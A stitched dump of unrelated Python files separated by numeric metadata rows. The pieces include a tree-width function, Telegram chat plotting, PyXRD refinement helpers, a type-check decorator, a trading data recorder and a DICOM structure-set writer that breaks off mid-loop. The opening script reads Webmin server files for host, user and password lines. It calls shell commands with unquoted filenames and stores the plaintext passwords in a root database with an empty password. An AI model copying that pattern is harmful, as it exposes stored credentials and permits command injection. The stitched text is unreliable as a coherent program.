from datetime import datetime
strPath = r"/etc/webmin/servers";# file dir
files = os.listdir(strPath)
lists = [];# file lists
host = [];
user = [];
pwd = [];
val = 0;# extractServer use
test = "";# grep host
test1 = "";# grep user
test2 = "";# grep pass
test3 = "";# Text = remove
test5 = "";# Text /n remove
test7 = "";# Text1 ' remove
test9 = "";# Text1 /n remove
#retry = "";# fail use filename show : no use
cnt1 = 0;# array file wc total count
filelenlist = [];# files wc total list
filelentotallist = ""; #files wc total list make word and reset
finallist = []; # final list after removing files with fewer than 11 rows
lenlist = [];
fcnt = [];# length 11 less count list
frows = 0;# length 11 less count
hs = "";# host
us = "";# user
ps = "";# pass
rows = 0;# file wc -l
row = 0;# file wc -l
count = 0;# total file count for 11 less count
servers = "";
#total = [];# value total : no use
##########################################################################################
# FUNCTION
##########################################################################################
def extractServer(server):
val = server.index('.')
result = server[:val]
return str(result).replace('[]','').replace('[', '').replace(']', '').replace("'",'')
def extractText1(text1):
#result = re.findall(r'^=[0-9]+(?:\.[0-9]+)', text)
result = re.findall(r'\d+',str(text1))
return str(result).replace('[]','').replace('[', '').replace(']', '').replace("'",'')
#def extractFile(file):
# result = re.search(r'.*[.].*$', file)
# return str(result).replace('[]','').replace('[', '').replace(']', '').replace("'",'')
def extractIp(ip):
result = re.findall(r'[0-9]+(?:\.[0-9]+){3}', ip)
return str(result).replace('[]','').replace('[', '').replace(']', '').replace("'",'')
#regex1 = re.compile(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$')
def extractText(text):
#result = re.findall(r'^=[0-9]+(?:\.[0-9]+)', text)
test3 = text.index('=')
test5 = text.index('\n')
result = text[test3+1:test5]
return str(result).replace('[]','').replace('[', '').replace(']', '').replace("'",'')
print("files = %s" % files)
servs = [file for file in files if file.endswith(".serv")]
cnt = 0;
now1 = datetime.now()
now = now1.strftime("%Y")+now1.strftime("%m")+now1.strftime("%d")
print("now = %s" %now);
print("servs = %s" % servs);
print("servs len = %s" % len(servs));
db = pymysql.connect(host='172.20.0.3', port=3306, user='root', passwd='', db='hms',charset='utf8',autocommit=True)
cursor = db.cursor()
##########################################################################################
# SERVER LIST PARSING & MARIADB INSERT
##########################################################################################
for serve in servs:
print("===================================================");
print("start row 11 less count check servs = %s : " % servs);
print("start row 11 less count check serve = %s : " % serve);
print("===================================================");
print("now count = %s :" % count);
lenlist.append(serve)
print("all lenlist count = %s :" % lenlist);
cnt2 = subprocess.check_output('cat /etc/webmin/servers/%s | wc -l' % lenlist[count],shell=True)
cnt1 = extractText1(cnt2)
filelenlist.append(cnt1)
print("now filelenlist = %s :" % filelenlist[count]);
#print("filelenlist.split() = %s : " % " ".join(filelenlist[count]));
#for y in range(filelenlist):
##filelenlist[count]
##for fll in filelenlist:
print("filelenlist[%d] = %s :" % (count, filelenlist));
## print("len(filelenlist) = %s :" % len(filelenlist));
#print("now fll = %s :" % fll);
#fl = fll.split(",")
filelentotallist = filelenlist[count]
print("now filelentotallist = %s :" % filelentotallist);
if filelentotallist == '11':
if count < len(servs):
#count = count + 1;
print("11 length ! pass ~~");
else:
fcnt.append(serve)
print(" no 11 length find ~~~ add value in fcnt + 1 = %s :" % count);
if count < len(servs):
#count = count + 1;
filelentotallist = "";
count = count + 1;
print("===================================================");
print("end row count = %s :" % count);
print("fcnt = %s :" % fcnt);
print("===================================================");
frows = len(fcnt)
print("frows = %s:" % frows);
##########################################################################################
# frows : files with fewer than 11 rows -> collect their filenames and remove them
##########################################################################################
for removes in fcnt:
servs.remove(removes)
print(" alter remove less 11 rows servs = %s :" % servs);
try:
with cursor:
sql_d = "DELETE FROM tests"
cursor.execute(sql_d)
db.commit()
for serv in servs:
lists.append(serv)
print("-----------------------------------------------------");
print("lists[cnt] = %s cnt = %d : " % (lists[cnt], cnt));
rows = subprocess.check_output('cat /etc/webmin/servers/%s | wc -l' % lists[cnt],shell=True)
row = extractText1(rows)
print("-----------------------------------------------------");
print("row = %s cnt = %d : " % (row, cnt));
print("-----------------------------------------------------");
servers = extractServer(serv)
#total.append(servers)
print("fname = %s" % servers);
if row == "11":
test = subprocess.check_output('cat /etc/webmin/servers/%s | grep host' % lists[cnt],shell=True)
test1 = subprocess.check_output('cat /etc/webmin/servers/%s | grep user' % lists[cnt],shell=True)
test2 = subprocess.check_output('cat /etc/webmin/servers/%s | grep pass' % lists[cnt],shell=True)
hs = extractIp(test.decode('utf-8'))
host.append(hs)
print("host =%s" % host[cnt]);
print("host[%d] =%s" % (cnt,host[cnt]));
#total.append(hs)
us = extractText(test1.decode('utf-8'))
user.append(us)
print("user =%s" % user[cnt]);
print("user[%d] =%s" % (cnt,user[cnt]));
#total.append(us)
ps = extractText(test2.decode('utf-8'))
pwd.append(ps)
print("pwd =%s" %pwd[cnt]);
print("pwd[%d] =%s" % (cnt,pwd[cnt]));
#total.append(ps)
#cursor.execute("INSERT INTO tests(fname,host,user,pwd,inputdt) VALUES (%s,%s,%s,%s,%s)" % (servers,host[cnt],user[cnt],pwd[cnt],now))
sql = "INSERT INTO `tests` (`fname`,`host`,`user`,`pwd`,`inputdt`) VALUES (%s,%s,%s,%s,%s)"
#for i in servs:
cursor.execute(sql, (servers,host[cnt],user[cnt],pwd[cnt],now))
data = cursor.fetchall()
db.commit()
if cnt < len(servs):
cnt = cnt+1;
else:
#print("cnt = %d:" % cnt);
#retry = servs[cnt]
#print("retry = %s : " % retry);
#if cnt < len(servs)-1:
# cnt = cnt;
# print("cnt = %d , cnt < len(servs):" % cnt);
# print("lists[cnt] = %s cnt = %d : " % (lists[cnt], cnt));
# continue
pass
#else:
# cnt = cnt;
# print("cnt = %d , cnt = len(servs): " % cnt);
# print("lists[cnt] = %s cnt = %d : " % (lists[cnt], cnt));
# continue
# pass
finally:
db.close()
print("servs = %s" % servs)
print("The currnt directory is: %s" % strPath)
| 42.198953
| 150
| 0.458561
| 863
| 8,060
| 4.274623
| 0.202781
| 0.056926
| 0.056926
| 0.029818
| 0.278124
| 0.261317
| 0.261317
| 0.208187
| 0.149092
| 0.088371
| 0
| 0.017614
| 0.25335
| 8,060
| 190
| 151
| 42.421053
| 0.595381
| 0.220596
| 0
| 0.140741
| 0
| 0.007407
| 0.230173
| 0.093937
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02963
| false
| 0.02963
| 0.037037
| 0
| 0.096296
| 0.259259
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b58403121af69cb7645522d11585b8ed10c27038
| 579
|
py
|
Python
|
algorithms/tree_level_width.py
|
danielhgasparin/algorithms-python
|
4b27c3cddd22762599fe55d3b760f388733c4fa7
|
[
"MIT"
] | null | null | null |
algorithms/tree_level_width.py
|
danielhgasparin/algorithms-python
|
4b27c3cddd22762599fe55d3b760f388733c4fa7
|
[
"MIT"
] | null | null | null |
algorithms/tree_level_width.py
|
danielhgasparin/algorithms-python
|
4b27c3cddd22762599fe55d3b760f388733c4fa7
|
[
"MIT"
] | null | null | null |
"""Tree level width module."""
from collections import deque
def tree_level_width(tree):
"""Return a list containing the width of each level of the specified tree."""
result = []
count = 0
queue = deque([tree.root, "s"])
while len(queue) > 0:
node = queue.popleft()
if node == "s":
            if count == 0:
break
else:
result.append(count)
count = 0
queue.append("s")
else:
count += 1
queue.extend(node.children)
return result
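# --- Added sketch (not part of the original module): a minimal tree shape the
# function assumes -- nodes expose .children and the tree exposes .root. The
# class names are hypothetical, chosen only to exercise the function.
class _Node:
    def __init__(self, value, children=None):
        self.value = value
        self.children = children or []

class _Tree:
    def __init__(self, root):
        self.root = root

if __name__ == "__main__":
    root = _Node(1, [_Node(2, [_Node(4)]), _Node(3)])
    print(tree_level_width(_Tree(root)))  # [1, 2, 1]
    # Caveat: "s" is used as a level sentinel, so nodes comparing equal to the
    # string "s" would confuse the traversal.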
| 26.318182
| 81
| 0.504318
| 66
| 579
| 4.393939
| 0.515152
| 0.062069
| 0.096552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014006
| 0.38342
| 579
| 22
| 82
| 26.318182
| 0.798319
| 0.165803
| 0
| 0.222222
| 0
| 0
| 0.006342
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b58c5490649547fd191436f9730cc2a2c51f3b00
| 3,619
|
py
|
Python
|
src/utils.py
|
Flantropy/TelegramChatAnalyzer
|
88e879fa771361d47292721ff8adfd82a74e9b93
|
[
"MIT"
] | null | null | null |
src/utils.py
|
Flantropy/TelegramChatAnalyzer
|
88e879fa771361d47292721ff8adfd82a74e9b93
|
[
"MIT"
] | null | null | null |
src/utils.py
|
Flantropy/TelegramChatAnalyzer
|
88e879fa771361d47292721ff8adfd82a74e9b93
|
[
"MIT"
] | null | null | null |
import json
import logging
from io import BytesIO
from typing import List
from typing import Optional
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from telegram import InputMediaPhoto
def __convert_plot_to_telegram_photo(plot) -> InputMediaPhoto:
with BytesIO() as buffer:
plot.figure.savefig(buffer)
plot.clear()
photo = InputMediaPhoto(buffer.getvalue())
return photo
def _unpack_telegram_document(update) -> dict:
"""
    Retrieve the JSON representation of a chat history
    from the given telegram.Update.
"""
document = update.message.document.get_file()
chat_file = BytesIO(document.download_as_bytearray())
chat_json = json.load(chat_file)
return chat_json
def _form_data_frame_from_json(chat_json) -> Optional[pd.DataFrame]:
try:
messages_df = pd.DataFrame(
chat_json['messages'],
columns=['id', 'type', 'date', 'from', 'text', 'media_type'])
except KeyError as e:
logging.getLogger().error(
msg=f'Unable to form DataFrame from json. '
f'Key "messages" not found. {e}'
)
return
else:
messages_df.set_index('id', inplace=True)
messages_df['date'] = pd.to_datetime(messages_df['date'])
return messages_df
def _make_barplot(messages_df: pd.DataFrame) -> InputMediaPhoto:
"""
:param messages_df: DataFrame with user messaging history
:return: telegram.InputMediaPhoto
"""
messages_per_month = messages_df['date'] \
.groupby(messages_df['date'].dt.to_period('M')) \
.agg('count')
plot = sns.barplot(
x=messages_per_month.index,
y=messages_per_month.values,
color=(0.44, 0.35, 0.95)
)
plt.xticks(rotation=45)
plt.title('All time history')
return __convert_plot_to_telegram_photo(plot)
def _make_kde_plot(messages_df: pd.DataFrame) -> InputMediaPhoto:
plot = sns.kdeplot(
x=messages_df['date'],
hue=messages_df['from'],
shade=True
)
plt.title('Activity by user')
plt.xticks(rotation=45)
plt.xlabel('')
return __convert_plot_to_telegram_photo(plot)
def _make_media_distribution_bar_plot(messages_df: pd.DataFrame) -> Optional[InputMediaPhoto]:
logging.getLogger().info('Enter media dist function')
media_dist_df = messages_df[['from', 'media_type']].value_counts()
if media_dist_df.empty:
return
media_dist_plot = media_dist_df.unstack().plot(
kind='bar',
stacked=True,
ylabel='Media messages',
xlabel='User'
)
plt.xticks(rotation=0)
plt.title('Distribution of media messages')
return __convert_plot_to_telegram_photo(media_dist_plot)
def _make_weekday_distribution_bar_plot(messages_df: pd.DataFrame) -> InputMediaPhoto:
dist_by_day_of_week = messages_df['from']\
.groupby(messages_df['date'].dt.weekday)\
.agg('value_counts')
plot = dist_by_day_of_week.unstack().plot(kind='bar')
plt.xlabel('')
plt.ylabel('Messages')
plt.xticks(
list(range(7)),
['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun'],
rotation=0
)
return __convert_plot_to_telegram_photo(plot)
def make_plots(messages_df: pd.DataFrame) -> List[InputMediaPhoto]:
sns.set_theme(context='paper')
photo_list = [
_make_barplot(messages_df),
_make_media_distribution_bar_plot(messages_df),
_make_kde_plot(messages_df),
_make_weekday_distribution_bar_plot(messages_df),
]
return [p for p in photo_list if p is not None]
| 30.411765
| 94
| 0.671733
| 464
| 3,619
| 4.950431
| 0.318966
| 0.095777
| 0.031345
| 0.054854
| 0.26121
| 0.182847
| 0.131911
| 0.05616
| 0.05616
| 0
| 0
| 0.005622
| 0.213595
| 3,619
| 118
| 95
| 30.669492
| 0.801476
| 0.049738
| 0
| 0.096774
| 0
| 0
| 0.091765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086022
| false
| 0
| 0.096774
| 0
| 0.290323
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b58c5890c2ea7e046b469064a62ceb8bea1ea212
| 2,215
|
py
|
Python
|
pyxrd/calculations/improve.py
|
PyXRD/pyxrd
|
26bacdf64f3153fa74b8caa62e219b76d91a55c1
|
[
"BSD-2-Clause"
] | 27
|
2018-06-15T15:28:18.000Z
|
2022-03-10T12:23:50.000Z
|
pyxrd/calculations/improve.py
|
PyXRD/pyxrd
|
26bacdf64f3153fa74b8caa62e219b76d91a55c1
|
[
"BSD-2-Clause"
] | 22
|
2018-06-14T08:29:16.000Z
|
2021-07-05T13:33:44.000Z
|
pyxrd/calculations/improve.py
|
PyXRD/pyxrd
|
26bacdf64f3153fa74b8caa62e219b76d91a55c1
|
[
"BSD-2-Clause"
] | 8
|
2019-04-13T13:03:51.000Z
|
2021-06-19T09:29:11.000Z
|
# coding=UTF-8
# ex:ts=4:sw=4:et=on
# Copyright (c) 2013, Mathijs Dumon
# All rights reserved.
# Complete license can be found in the LICENSE file.
from io import StringIO
from scipy.optimize import fmin_l_bfgs_b
from .exceptions import wrap_exceptions
def setup_project(projectf):
from pyxrd.file_parsers.json_parser import JSONParser
from pyxrd.project.models import Project
type(Project).object_pool.clear()
f = StringIO(projectf)
project = JSONParser.parse(f)
f.close()
return project
@wrap_exceptions
def run_refinement(projectf, mixture_index):
"""
    Run a refinement for:
- projectf: project data
- mixture_index: what mixture in the project to use
"""
if projectf is not None:
from pyxrd.data import settings
settings.initialize()
# Retrieve project and mixture:
project = setup_project(projectf)
del projectf
import gc
gc.collect()
mixture = project.mixtures[mixture_index]
mixture.refinement.update_refinement_treestore()
refiner = mixture.refinement.get_refiner()
refiner.refine()
return list(refiner.history.best_solution), refiner.history.best_residual
@wrap_exceptions
def improve_solution(projectf, mixture_index, solution, residual, l_bfgs_b_kwargs={}):
if projectf is not None:
from pyxrd.data import settings
settings.initialize()
# Retrieve project and mixture:
project = setup_project(projectf)
del projectf
mixture = project.mixtures[mixture_index]
with mixture.data_changed.ignore():
# Setup context again:
mixture.update_refinement_treestore()
refiner = mixture.refinement.get_refiner()
# Refine solution
vals = fmin_l_bfgs_b(
refiner.get_residual,
solution,
approx_grad=True,
bounds=refiner.ranges,
**l_bfgs_b_kwargs
)
new_solution, new_residual = tuple(vals[0:2])
# Return result
return new_solution, new_residual
else:
return solution, residual
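# --- Added sketch (not part of the original module): a self-contained toy run of
# the fmin_l_bfgs_b call pattern used above, minimizing a quadratic "residual".
if __name__ == "__main__":
    def toy_residual(v):
        return (v[0] - 1.0) ** 2 + (v[1] + 2.0) ** 2

    vals = fmin_l_bfgs_b(toy_residual, [0.0, 0.0], approx_grad=True,
                         bounds=[(-5.0, 5.0), (-5.0, 5.0)])
    best_solution, best_residual = tuple(vals[0:2])
    print(best_solution, best_residual)  # ~[1.0, -2.0], ~0.0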
| 27.012195
| 86
| 0.648307
| 254
| 2,215
| 5.484252
| 0.42126
| 0.043073
| 0.017229
| 0.014358
| 0.315865
| 0.26705
| 0.26705
| 0.26705
| 0.18234
| 0.18234
| 0
| 0.005643
| 0.27991
| 2,215
| 81
| 87
| 27.345679
| 0.867712
| 0.163883
| 0
| 0.340426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.170213
| 0
| 0.319149
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b58ccbfff32cc054d600f5f7877ef4514f099933
| 931
|
py
|
Python
|
enforceTH.py
|
Multivalence/enforceTypeHint
|
fb87fd48baa525044516ddbdf2160128e03fb7b7
|
[
"MIT"
] | null | null | null |
enforceTH.py
|
Multivalence/enforceTypeHint
|
fb87fd48baa525044516ddbdf2160128e03fb7b7
|
[
"MIT"
] | null | null | null |
enforceTH.py
|
Multivalence/enforceTypeHint
|
fb87fd48baa525044516ddbdf2160128e03fb7b7
|
[
"MIT"
] | 1
|
2020-12-16T18:34:19.000Z
|
2020-12-16T18:34:19.000Z
|
import functools

def enforceType(func):
    @functools.wraps(func)
    def wrapper(*args):
        wrapper.has_been_called = True
        x = func.__annotations__
        t = [x[i] for i in x if i != 'return']
        if len(args) != len(t):
            raise TypeError("Missing required positional arguments and/or annotations.")
        for i in range(len(t)):
            if not isinstance(args[i], t[i]):
                raise ValueError(f"Invalid literal for {t[i]}: {args[i]}")
        try:
            ReturnValue = x['return']
        except KeyError:
            raise TypeError("Missing required return value annotation.")
        try:
            RV = func(*args)
        except Exception as e:
            raise Exception(e)
        # `-> None` annotations become NoneType so the isinstance check below works
        ReturnValue = type(ReturnValue) if ReturnValue is None else ReturnValue
        if not isinstance(RV, ReturnValue):
            raise SyntaxWarning(f"Expected function to return {ReturnValue}. Got {type(RV)} instead.")
        return RV
    wrapper.has_been_called = False
    return wrapper
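A hedged usage sketch of the decorator above; the `add` function is an assumption for illustration:

# Hypothetical decorated function.
@enforceType
def add(a: int, b: int) -> int:
    return a + b

add(1, 2)    # returns 3; add.has_been_called is now True
add("1", 2)  # raises ValueError: the first argument is not an int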
| 23.275
| 94
| 0.664876
| 124
| 931
| 4.927419
| 0.451613
| 0.032733
| 0.045827
| 0.065466
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.221267
| 931
| 39
| 95
| 23.871795
| 0.842759
| 0
| 0
| 0.076923
| 0
| 0
| 0.228786
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.038462
| 0
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b591052db3d50aa3c4ca4b5f6cbba2c5ca1708a6
| 3,239
|
py
|
Python
|
examples/DataRecording/runDataRecording.py
|
mumuwoyou/pytrader
|
6b94e0c8ecbc3ef238cf31715acf8474b9d26b4a
|
[
"MIT"
] | 4
|
2019-03-14T05:30:59.000Z
|
2021-11-21T20:05:22.000Z
|
examples/DataRecording/runDataRecording.py
|
mumuwoyou/pytrader
|
6b94e0c8ecbc3ef238cf31715acf8474b9d26b4a
|
[
"MIT"
] | null | null | null |
examples/DataRecording/runDataRecording.py
|
mumuwoyou/pytrader
|
6b94e0c8ecbc3ef238cf31715acf8474b9d26b4a
|
[
"MIT"
] | 4
|
2019-02-14T14:30:46.000Z
|
2021-01-05T09:46:19.000Z
|
# encoding: UTF-8

from __future__ import print_function

import sys
try:
    reload(sys)  # Python 2
    sys.setdefaultencoding('utf8')
except NameError:
    pass         # Python 3

import multiprocessing
from time import sleep
from datetime import datetime, time

from cyvn.trader.vtEvent import EVENT_LOG, EVENT_RECORDER_DAY, EVENT_ERROR
from cyvn.trader.eventEngine import EventEngine2, Event
from cyvn.trader.vtEngine import MainEngine, LogEngine
from cyvn.trader.gateway.CtpGateway import ctpGateway
from cyvn.trader.app import dataRecorder

#----------------------------------------------------------------------
def processErrorEvent(event):
    """
    Handle error events.
    After every login the server re-pushes all errors generated that day,
    so these are printed rather than written to the log.
    """
    error = event.dict_['data']
    print(u'Error code: %s, error message: %s' % (error.errorID, error.errorMsg))

#----------------------------------------------------------------------
def runChildProcess():
    """Entry point of the child process."""
    print('-' * 20)

    # Create the log engine
    le = LogEngine()
    le.setLogLevel(le.LEVEL_INFO)
    le.addConsoleHandler()
    le.info(u'Starting the market data recorder child process')

    ee = EventEngine2()
    le.info(u'Event engine created')

    me = MainEngine(ee)
    me.addGateway('CTP')
    me.addApp(dataRecorder)
    le.info(u'Main engine created')

    ee.register(EVENT_LOG, le.processLogEvent)
    ee.register(EVENT_ERROR, processErrorEvent)
    le.info(u'Registered log event listener')

    me.connect('CTP')
    le.info(u'Connected to the CTP gateway')

    has_recorder_day = False
    while True:
        sleep(1)
        if has_recorder_day == False:
            time_now = datetime.now()
            if time_now.time().hour == 15 and time_now.time().minute > 5:
                event1 = Event(type_=EVENT_RECORDER_DAY)
                ee.put(event1)
                has_recorder_day = True

#----------------------------------------------------------------------
def runParentProcess():
    """Entry point of the parent (watchdog) process."""
    # Create the log engine
    le = LogEngine()
    le.setLogLevel(le.LEVEL_INFO)
    le.addConsoleHandler()
    le.info(u'Starting the market data recorder parent process')

    DAY_START = time(8, 57)     # day session start/stop times
    DAY_END = time(15, 18)
    NIGHT_START = time(20, 57)  # night session start/stop times
    NIGHT_END = time(2, 33)

    p = None                    # child process handle

    while True:
        currentTime = datetime.now().time()
        recording = False

        # Determine which session window we are in
        if ((currentTime >= DAY_START and currentTime <= DAY_END) or
            (currentTime >= NIGHT_START) or
            (currentTime <= NIGHT_END)):
            recording = True

        # Filter out weekend periods: all of Saturday, the Friday night session, the Sunday day session
        if ((datetime.today().weekday() == 6) or
            (datetime.today().weekday() == 5 and currentTime > NIGHT_END) or
            (datetime.today().weekday() == 0 and currentTime < DAY_START)):
            recording = False

        # Inside a recording window: make sure the child process is running
        if recording and p is None:
            le.info(u'Starting child process')
            p = multiprocessing.Process(target=runChildProcess)
            p.start()
            le.info(u'Child process started')

        # Outside a recording window: shut the child process down
        if not recording and p is not None:
            le.info(u'Stopping child process')
            p.terminate()
            p.join()
            p = None
            le.info(u'Child process stopped')

        sleep(5)

if __name__ == '__main__':
    #runChildProcess()
    runParentProcess()
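The parent loop's session-window test can be exercised in isolation; a minimal sketch under the same constants (the helper name in_recording_window is an assumption, not part of the script):

from datetime import time

DAY_START, DAY_END = time(8, 57), time(15, 18)
NIGHT_START, NIGHT_END = time(20, 57), time(2, 33)

def in_recording_window(now):
    # True if `now` falls inside the day session or the overnight session.
    return (DAY_START <= now <= DAY_END) or now >= NIGHT_START or now <= NIGHT_END

assert in_recording_window(time(9, 30))      # day session
assert in_recording_window(time(23, 0))      # night session
assert not in_recording_window(time(17, 0))  # between sessions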
| 26.120968
| 77
| 0.562211
| 346
| 3,239
| 5.135838
| 0.378613
| 0.033765
| 0.039392
| 0.018571
| 0.075408
| 0.075408
| 0.075408
| 0.075408
| 0.075408
| 0.075408
| 0
| 0.013502
| 0.268293
| 3,239
| 123
| 78
| 26.333333
| 0.736287
| 0.12967
| 0
| 0.151899
| 0
| 0
| 0.041096
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037975
| false
| 0.012658
| 0.126582
| 0
| 0.164557
| 0.037975
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b593abbfc1101fb51b4b3e49fd3161d9712060e7
| 12,779
|
py
|
Python
|
sitk_rtss_io.py
|
Auto-segmentation-in-Radiation-Oncology/Chapter-3
|
307330c848c7ddb650353484e18fa9bc7903f737
|
[
"BSD-3-Clause"
] | 1
|
2020-06-28T01:57:46.000Z
|
2020-06-28T01:57:46.000Z
|
sitk_rtss_io.py
|
Auto-segmentation-in-Radiation-Oncology/Chapter-12
|
307330c848c7ddb650353484e18fa9bc7903f737
|
[
"BSD-3-Clause"
] | null | null | null |
sitk_rtss_io.py
|
Auto-segmentation-in-Radiation-Oncology/Chapter-12
|
307330c848c7ddb650353484e18fa9bc7903f737
|
[
"BSD-3-Clause"
] | 1
|
2021-11-15T21:47:17.000Z
|
2021-11-15T21:47:17.000Z
|
from skimage import measure
import pydicom
from pydicom.dataset import Dataset, FileDataset
from pydicom.sequence import Sequence
import os
import numpy as np
import SimpleITK as sITK
import time
import glob
import sitk_ct_io as imio
from skimage.draw import polygon

# for debugging
# import matplotlib.pyplot as plt
# import matplotlib.image as mpimg

def read_rtss_to_sitk(rtss_file, image_dir, return_names=True, return_image=False):
    # modified code from xuefeng
    # http://aapmchallenges.cloudapp.net/forums/3/2/
    #
    # The image directory is required to set the spacing on the label map

    # read the rtss
    contours, label_names = read_contours(pydicom.read_file(rtss_file))

    # read the ct
    dcms = []
    for subdir, dirs, files in os.walk(image_dir):
        dcms = glob.glob(os.path.join(subdir, "*.dcm"))
    slices = [pydicom.read_file(dcm) for dcm in dcms]
    slices.sort(key=lambda x: float(x.ImagePositionPatient[2]))
    image = np.stack([s.pixel_array for s in slices], axis=-1)

    # convert to mask
    atlas_labels = get_mask(contours, slices, image)
    atlas_image = imio.read_sitk_image_from_dicom(image_dir)
    atlas_labels.SetOrigin(atlas_image.GetOrigin())
    atlas_labels.SetSpacing(atlas_image.GetSpacing())

    if not return_names:
        return atlas_labels
    elif not return_image:
        return atlas_labels, label_names
    else:
        return atlas_labels, label_names, atlas_image

def write_rtss_from_sitk(labels, label_names, ct_directory, output_filename):
    # labels is a sITK image volume with integer labels for the objects
    # assumes 0 for background and consecutive label numbers starting from 1
    # corresponding to the label_names
    # the ct_directory is required to correctly link the UIDs

    # load ct to get slice UIDs, z-slices and anything else we might need
    slice_info = {}
    series_info = {}
    z_values = []
    first_slice = True
    spacing = [0, 0]
    origin = [0, 0]
    with os.scandir(ct_directory) as it:
        for entry in it:
            if not entry.name.startswith('.') and entry.is_file():
                slice_file = ct_directory + entry.name
                dicom_info = pydicom.read_file(slice_file)
                slice_info[str(float(dicom_info.SliceLocation))] = dicom_info.SOPInstanceUID
                z_values.append(float(dicom_info.SliceLocation))
                if first_slice:
                    # get generic information
                    series_info['SOPClassUID'] = dicom_info.SOPClassUID
                    series_info['FrameOfReferenceUID'] = dicom_info.FrameOfReferenceUID
                    series_info['StudyInstanceUID'] = dicom_info.StudyInstanceUID
                    series_info['SeriesInstanceUID'] = dicom_info.SeriesInstanceUID
                    series_info['PatientName'] = dicom_info.PatientName
                    series_info['PatientID'] = dicom_info.PatientID
                    series_info['PatientBirthDate'] = dicom_info.PatientBirthDate
                    series_info['PatientSex'] = dicom_info.PatientSex
                    spacing[0] = float(dicom_info.PixelSpacing[0])
                    spacing[1] = float(dicom_info.PixelSpacing[1])
                    origin[0] = float(dicom_info.ImagePositionPatient[0])
                    origin[1] = float(dicom_info.ImagePositionPatient[1])
                    # Assuming axial for now
                    first_slice = False
    z_values = np.sort(z_values)

    current_time = time.localtime()
    modification_time = time.strftime("%H%M%S", current_time)
    modification_time_long = modification_time + '.123456'  # made up
    modification_date = time.strftime("%Y%m%d", current_time)

    file_meta = Dataset()
    file_meta.FileMetaInformationGroupLength = 192
    file_meta.MediaStorageSOPClassUID = '1.2.840.10008.5.1.4.1.1.481.3'
    file_meta.MediaStorageSOPInstanceUID = "1.2.826.0.1.3680043.2.1125." + modification_time + ".3" + modification_date
    file_meta.ImplementationClassUID = "1.2.3.771212.061203.1"
    file_meta.TransferSyntaxUID = '1.2.840.10008.1.2'
    pydicom.dataset.validate_file_meta(file_meta, True)

    ds = FileDataset(output_filename, {},
                     file_meta=file_meta, preamble=b"\0" * 128)

    # Add the data elements
    ds.PatientName = series_info['PatientName']
    ds.PatientID = series_info['PatientID']
    ds.PatientBirthDate = series_info['PatientBirthDate']
    ds.PatientSex = series_info['PatientSex']

    # Set the transfer syntax
    ds.is_little_endian = True
    ds.is_implicit_VR = True

    # Set lots of tags
    ds.ContentDate = modification_date
    ds.SpecificCharacterSet = 'ISO_IR 100'  # probably not true TODO Check
    ds.InstanceCreationDate = modification_date
    ds.InstanceCreationTime = modification_time_long
    ds.StudyDate = modification_date
    ds.SeriesDate = modification_date
    ds.ContentTime = modification_time
    ds.StudyTime = modification_time_long
    ds.SeriesTime = modification_time_long
    ds.AccessionNumber = ''
    ds.SOPClassUID = '1.2.840.10008.5.1.4.1.1.481.3'  # RT Structure Set Storage
    ds.SOPInstanceUID = "1.2.826.0.1.3680043.2.1125." + modification_time + ".3" + modification_date
    ds.Modality = "RTSTRUCT"
    ds.Manufacturer = "Python software"
    ds.ManufacturersModelName = 'sitk_rtss_io.py'
    ds.ReferringPhysiciansName = ''
    ds.StudyDescription = ""
    ds.SeriesDescription = "RTSS from SimpleITK data"
    ds.StudyInstanceUID = series_info['StudyInstanceUID']
    ds.SeriesInstanceUID = "1.2.826.0.1.3680043.2.1471." + modification_time + ".4" + modification_date
    ds.StructureSetLabel = "RTSTRUCT"
    ds.StructureSetName = ''
    ds.StructureSetDate = modification_time
    ds.StructureSetTime = modification_time

    contour_sequence = Sequence()
    for slice_z in z_values:
